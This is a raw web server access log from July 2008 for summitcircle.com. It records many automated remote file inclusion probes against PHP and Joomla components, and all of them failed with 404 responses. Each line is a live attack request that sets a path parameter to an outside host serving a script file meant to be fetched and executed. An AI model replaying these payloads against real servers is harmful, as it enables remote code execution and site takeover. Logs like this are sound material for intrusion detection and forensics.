200.6.155.114 - - [06/Jul/2008:17:55:15 -0700] "GET /logs/access_071029.log/index.php?dir=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.6.155.114 - - [06/Jul/2008:17:55:15 -0700] "GET /index.php?dir=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.6.155.114 - - [06/Jul/2008:17:55:16 -0700] "GET /logs/index.php?dir=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
116.40.122.120 - - [06/Jul/2008:17:55:49 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.summitcircle.com"
116.40.122.120 - - [06/Jul/2008:17:55:49 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.summitcircle.com"
222.251.223.180 - - [06/Jul/2008:17:56:24 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
222.251.223.180 - - [06/Jul/2008:17:56:25 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.98.78.150 - - [06/Jul/2008:17:56:39 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.20.120.10 - - [06/Jul/2008:17:57:51 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:17:58:33 -0700] "GET /logs/access_071112.log//display.php?path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:17:58:34 -0700] "GET //display.php?path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:17:58:34 -0700] "GET /logs//display.php?path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.36.2.24 - - [06/Jul/2008:17:59:13 -0700] "GET /logs/access_080310.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.36.2.24 - - [06/Jul/2008:17:59:13 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.36.2.24 - - [06/Jul/2008:17:59:13 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.118.110.17 - - [06/Jul/2008:17:59:15 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.36.2.24 - - [06/Jul/2008:17:59:42 -0700] "GET /logs/access_080526.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.118.110.17 - - [06/Jul/2008:17:59:56 -0700] "GET /logs/access_080310.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.118.110.17 - - [06/Jul/2008:17:59:56 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:59:56 -0700] "GET /logs/access.log/index.php?a=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:59:56 -0700] "GET /logs/index.php?a=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:59:56 -0700] "GET /index.php?a=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
87.118.110.17 - - [06/Jul/2008:17:59:56 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.3.74.226 - - [06/Jul/2008:18:00:02 -0700] "GET /logs/access_071224.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
89.108.67.216 - - [06/Jul/2008:18:00:17 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.118.110.17 - - [06/Jul/2008:18:00:25 -0700] "GET /logs/access_080526.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:00:31 -0700] "GET /logs/access_071112.log/content.php?inc=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:00:32 -0700] "GET /logs/content.php?inc=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:00:32 -0700] "GET /content.php?inc=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.20.120.10 - - [06/Jul/2008:18:00:41 -0700] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.108.67.216 - - [06/Jul/2008:18:00:45 -0700] "GET /logs/access_071008.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.251.223.180 - - [06/Jul/2008:18:01:06 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.251.223.180 - - [06/Jul/2008:18:01:07 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.36.2.24 - - [06/Jul/2008:18:05:00 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.212.0.39 - - [06/Jul/2008:18:08:55 -0700] "GET /logs/access_070820.log/index.php?id=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
201.212.0.39 - - [06/Jul/2008:18:08:58 -0700] "GET /index.php?id=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
201.212.0.39 - - [06/Jul/2008:18:08:59 -0700] "GET /logs/index.php?id=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.52.75.98 - - [06/Jul/2008:18:09:16 -0700] "GET /db.php?path_local=http://sanwalll.by.ru/sad.gif?&cmd=?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.52.75.98 - - [06/Jul/2008:18:09:16 -0700] "GET /logs/db.php?path_local=http://sanwalll.by.ru/sad.gif?&cmd=?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.52.75.98 - - [06/Jul/2008:18:09:16 -0700] "GET /logs/access_080225.log/db.php?path_local=http://sanwalll.by.ru/sad.gif?&cmd=?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.52.75.98 - - [06/Jul/2008:18:09:17 -0700] "GET /logs/access_080512.log/db.php?path_local=http://sanwalll.by.ru/sad.gif?&cmd=?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:09:45 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:09:45 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:09:45 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:09:56 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:09:57 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:18:09:57 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
200.6.155.114 - - [06/Jul/2008:18:10:07 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.36.2.24 - - [06/Jul/2008:18:10:50 -0700] "GET /logs/access_080310.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.36.2.24 - - [06/Jul/2008:18:10:50 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.36.2.24 - - [06/Jul/2008:18:10:51 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.6.155.114 - - [06/Jul/2008:18:10:54 -0700] "GET /logs/access_071008.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.36.2.24 - - [06/Jul/2008:18:11:14 -0700] "GET /logs/access_080526.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/fr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
78.24.133.93 - - [06/Jul/2008:18:11:39 -0700] "GET /logs/access_080406.log//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.24.133.93 - - [06/Jul/2008:18:11:39 -0700] "GET //appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.24.133.93 - - [06/Jul/2008:18:11:40 -0700] "GET /logs//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.29.68.220 - - [06/Jul/2008:18:11:45 -0700] "GET /logs/access_080406.log//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.68.220 - - [06/Jul/2008:18:11:45 -0700] "GET //appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.68.220 - - [06/Jul/2008:18:11:46 -0700] "GET /logs//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.6.155.114 - - [06/Jul/2008:18:12:11 -0700] "GET /logs/access_070813.log/index.php?id=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.63.2.169 - - [06/Jul/2008:18:13:37 -0700] "GET /logs/access.log/admin/index.php?o=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
74.63.2.169 - - [06/Jul/2008:18:13:37 -0700] "GET /admin/index.php?o=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
74.63.2.169 - - [06/Jul/2008:18:13:37 -0700] "GET /logs/admin/index.php?o=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.55.179.141 - - [06/Jul/2008:18:14:20 -0700] "GET /logs/access_070826.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
72.55.179.141 - - [06/Jul/2008:18:14:26 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
72.55.179.141 - - [06/Jul/2008:18:14:46 -0700] "GET /logs/access_080204.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
72.55.179.141 - - [06/Jul/2008:18:15:12 -0700] "GET /logs/access_070826.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.55.179.141 - - [06/Jul/2008:18:15:12 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.55.179.141 - - [06/Jul/2008:18:15:13 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:15:52 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:15:52 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:15:53 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
72.55.179.141 - - [06/Jul/2008:18:15:57 -0700] "GET /logs/access_080204.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.55.179.141 - - [06/Jul/2008:18:16:12 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
72.55.179.141 - - [06/Jul/2008:18:16:47 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:18:00 -0700] "GET /logs/access_080210.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:18:00 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:18:00 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
82.98.78.150 - - [06/Jul/2008:18:18:01 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.98.78.150 - - [06/Jul/2008:18:18:01 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:18:18 -0700] "GET /index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:18:18 -0700] "GET /logs/index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:18:33 -0700] "GET /logs/access_080127.log/index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:18:36 -0700] "GET /logs/access_071112.log/index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
203.22.204.188 - - [06/Jul/2008:18:19:22 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.246.218.239 - - [06/Jul/2008:18:19:58 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
66.246.218.239 - - [06/Jul/2008:18:19:58 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
66.246.218.239 - - [06/Jul/2008:18:19:58 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.29.68.220 - - [06/Jul/2008:18:21:15 -0700] "GET /logs/access_080406.log//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.68.220 - - [06/Jul/2008:18:21:15 -0700] "GET //appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.68.220 - - [06/Jul/2008:18:21:15 -0700] "GET /logs//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.193.130.151 - - [06/Jul/2008:18:21:15 -0700] "GET /logs/access_070813.log/index.php?id=http://grupo.e-sportv.com/id.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
91.198.175.18 - - [06/Jul/2008:18:21:58 -0700] "GET /logs/access_080512.log/index.php?option=com_custompages&cpage=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
91.198.175.18 - - [06/Jul/2008:18:21:58 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
91.198.175.18 - - [06/Jul/2008:18:22:20 -0700] "GET /logs/access_080414.log/index.php?option=com_custompages&cpage=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:22:21 -0700] "GET //common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:22:21 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:22:22 -0700] "GET //common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:22:22 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.summitcircle.com"
217.16.26.124 - - [06/Jul/2008:18:22:26 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.summitcircle.com"
217.16.26.124 - - [06/Jul/2008:18:22:26 -0700] "GET //common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.summitcircle.com"
78.24.133.93 - - [06/Jul/2008:18:24:15 -0700] "GET /logs/access_080406.log//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.24.133.93 - - [06/Jul/2008:18:24:15 -0700] "GET //appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.24.133.93 - - [06/Jul/2008:18:24:16 -0700] "GET /logs//appserv/main.php?appserv_root=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.86.123.123 - - [06/Jul/2008:18:24:22 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "summitcircle.com"
80.86.123.123 - - [06/Jul/2008:18:24:22 -0700] "GET /logs/access.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "summitcircle.com"
80.86.123.123 - - [06/Jul/2008:18:24:23 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "summitcircle.com"
80.86.123.123 - - [06/Jul/2008:18:24:23 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "summitcircle.com"
80.86.123.123 - - [06/Jul/2008:18:24:23 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "summitcircle.com"
80.86.123.123 - - [06/Jul/2008:18:24:23 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "summitcircle.com"
64.38.22.250 - - [06/Jul/2008:18:24:54 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
64.38.22.250 - - [06/Jul/2008:18:24:54 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
64.38.22.250 - - [06/Jul/2008:18:24:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
